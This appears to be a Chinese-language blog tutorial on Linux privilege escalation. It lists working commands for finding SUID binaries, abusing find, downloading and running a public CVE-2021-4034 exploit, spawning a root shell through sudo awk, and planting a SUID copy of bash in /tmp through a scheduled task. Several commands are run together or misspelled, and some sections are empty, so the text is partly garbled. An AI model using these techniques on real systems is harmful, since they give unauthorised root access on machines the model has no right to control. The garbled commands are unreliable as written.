时隔多天,熊哥也王者归来了,那么今天给大家带来的是“权限提升”!
通过ssh连接主机环境
通过linux-exploit-suggester查询可能存在的提权漏洞:linux-exploit-suggester下载地址:https://github.com/The-Z-Labs/linux-exploit-suggester
运行检测脚本:
chomd +x linux-exploit-suggester.shlinux-exploit-suggester.sh
寻找具备SUID权限的程序
find / -perm -u=s -type f 2>/dev/null
目前已经可以用来提权的文件如下:
nmapvimfindbashmorelessnanocp
find提权
touch 1find 1 -exec whoami \;
bash提权
在漏洞查询的过程中,发现漏洞CVE-2021-4034可以利用下载地址:https://github.com/berdav/CVE-2021-4034/
下载exp解压
chmod +x cve-2021-4034.sh ./cve-2021-4034.sh
sudo 是可以让某个用户不需要拥有管理员的账号密码,可以执行管理员的权限。作为管理员可以指派某些用户可以执行某些特定命令。授权之后,能够让某用户以另外一个用户的身份运行命令。
awk命令提权
sudo awk 'BEGIN {system("/bin/bash")}'
ed命令提权
查看计划任务
cp /bin/bash /tmp/bash; chmod +s /tmp/bash
切换到tmp目录下